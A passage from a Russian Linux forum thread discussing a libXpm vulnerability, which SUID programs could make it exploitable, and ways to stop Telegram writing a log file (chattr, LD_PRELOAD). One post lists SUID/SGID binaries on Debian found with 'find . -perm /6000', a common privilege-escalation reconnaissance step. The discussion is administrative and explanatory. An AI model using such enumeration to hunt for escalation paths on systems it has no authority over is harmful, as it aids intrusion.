Но если хочешь чтоб быстрей отпустило, дай доступ на ограниченый экаунт в которм суидишная компроментированная/вулнерабная прожка есть

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #54 Ответы: #109

109. Сообщение от Admino (ok), 23-Янв-23, 19:45   +/
Так вот мне и интересно было, где это в дистрибутивах встречается графическая тулза с суидом и libXpm.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #108 Ответы: #117

110. Сообщение от dannyD (?), 23-Янв-23, 22:12   +/
разумеется сслыка будет прибита, а на ёё месте будет новый файл.

PS. это первое, что было испробовано.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #107

111. Сообщение от dannyD (?), 23-Янв-23, 22:19   +/
тоже самое с ~/.xsession-errors от lightdm

лечится ковырянием сырца с переносом в /tmp который на tmpfs

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #107

112. Сообщение от Омномним (?), 24-Янв-23, 00:11   +/
Пока что только новость о выходе за пределы сознания.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #34

113. Сообщение от Аноним (-), 24-Янв-23, 04:19   +/
> и все еще вижу сьюды в рута в программах, которые используются
> постоянно в работающей системе, типа: mount/mount.nfs, unix_chkpwd, at, crontab,
> su, passwd/gpasswd, fusermount.

И которой из них сабжа надо?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #103

114. Сообщение от Аноним (-), 24-Янв-23, 04:23   +/
> конкретно телеграмм отказывается запускаться с отбитым логом.

Ггг лол, ну, я бы если пользовался этим крапом вгрузил бы LD_PRELOAD'ом libfxxxoff.so - который так то open() с вон тем аргументом как-бы сделает. Теоретически. Практически, делать что-то с файлами в фс при этом совершенно не обязательно, только имитировать что все прокатило. Можно подумать, оно еще и проверять содержимое будет. Главное грамотно с314ть что все збс :)

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #101 Ответы: #116

115. Сообщение от Аноним (1), 24-Янв-23, 05:28   +/
> чтоб в файле нулевой длины ... запускаемая программа (телеграм) ничего не могла

частенько встречается такая задача, погасить неуёмное приложение. Инструменты все озвучены выше: закрепление и рут-владелец (и на группу тоже).

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #79

116. Сообщение от dannyD (?), 24-Янв-23, 07:48   +/
нихтфирштейн.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #114

117. Сообщение от OpenEcho (?), 25-Янв-23, 00:03   +/
> Так вот мне и интересно было, где это в дистрибутивах встречается графическая
> тулза с суидом и libXpm.

А-а-а, вы о этом, сори, не понял... к сожалению помимо безобидного текстового XPM, есть еще

```
<xmp>

find . -perm /6000
./usr/bin/fusermount3
./usr/bin/wall
./usr/bin/passwd
./usr/bin/newgrp
./usr/bin/gpasswd
./usr/bin/chsh
./usr/bin/su
./usr/bin/expiry
./usr/bin/mount
./usr/bin/umount
./usr/bin/sudo
./usr/bin/mlocate
./usr/bin/chage
./usr/bin/ssh-agent
./usr/bin/write.ul
./usr/bin/dotlockfile
./usr/bin/crontab
./usr/bin/chfn
./usr/sbin/unix_chkpwd
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/lib/x86_64-linux-gnu/utempter/utempter
./usr/lib/openssh/ssh-keysign
./usr/local/share/fonts
./run/log/journal
./var/log/journal
./var/log/journal/0289d16f3787f03a0475a594054e4e77
./var/mail
./var/local

</xmp>
```

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #109 Ответы: #118

118. Сообщение от Admino (ok), 25-Янв-23, 00:08   +/
Зачем ты привёл кучу текстовых утилит, которые к libXpm никаким боком отношения не имеют? Не говоря уже про логи?

Ты ChatGPT, что ли?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #117 Ответы: #121

119. Сообщение от Аноним (119), 25-Янв-23, 04:59   +/
sudo chattr +ai /path/to/file

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #79

120. Сообщение от Аноним (119), 25-Янв-23, 05:12   +/
Угар, конечно, как в тут
папуасы ругают классику программирования под юникс — т.н. shell out. А ведь это неотъемлемая часть «юникс-философии», за которую в комментариях порой убить готовы. Как же так выходит, половина комментаторов TAOUP не читала? Грешновато.
Ответить | Правка | Наверх | Cообщить модератору

121. Сообщение от OpenEcho (?), 25-Янв-23, 19:55   +/
> Зачем ты привёл кучу текстовых утилит,

Это /usr/bin/passwd текстовая утилита ?

> которые к libXpm никаким боком отношения не имеют?

А мы разве не отошли он libXPM и говорим про программы которые работают под SUID/GUID ?

>Не говоря уже про логи?

Это не логи, это выхлоп от

find . -perm /6000

который в данном случае искал на ванильном дебиане все программы от корня на которых установлен SUID/GUID

> Ты ChatGPT, что ли?

Платить калеки ChatGPT чтоб развлекать местных анонимов?! А вы батенька шутник...

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #118 Ответы: #122

122. Сообщение от Admino (ok), 25-Янв-23, 20:01   +/
> Это /usr/bin/passwd текстовая утилита ?

Это троллинг тупостью? Да, /usr/bin/passwd - это текстовая утилита.

> А мы разве не отошли он libXPM и говорим про программы которые
> работают под SUID/GUID ?

Для эксплуатации уязвимости требуется а) программа, использующая libXpm и б) программа, имеющая suid бит.

Условия а) и б) должны выполняться одновременно.

Я таких программ в современном дистрибутиве не нашёл. Теперь ты мне приводишь вывод find, в котором логи и куча консольщины. Зачем?

> Это не логи, это выхлоп от
> find . -perm /6000
> который в данном случае искал на ванильном дебиане все программы от корня
> на которых установлен SUID/GUID

И нашёл логи, потому что там на каталогах SGID.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #121 Ответы: #123

123. Сообщение от OpenEcho (?), 26-Янв-23, 00:28   +/
> Это троллинг тупостью? Да, /usr/bin/passwd - это текстовая утилита.

О-о-о, понятно, еще один умный пуп, ну-ну  смакуй дальше сам какой ты "умный"

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #122


Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру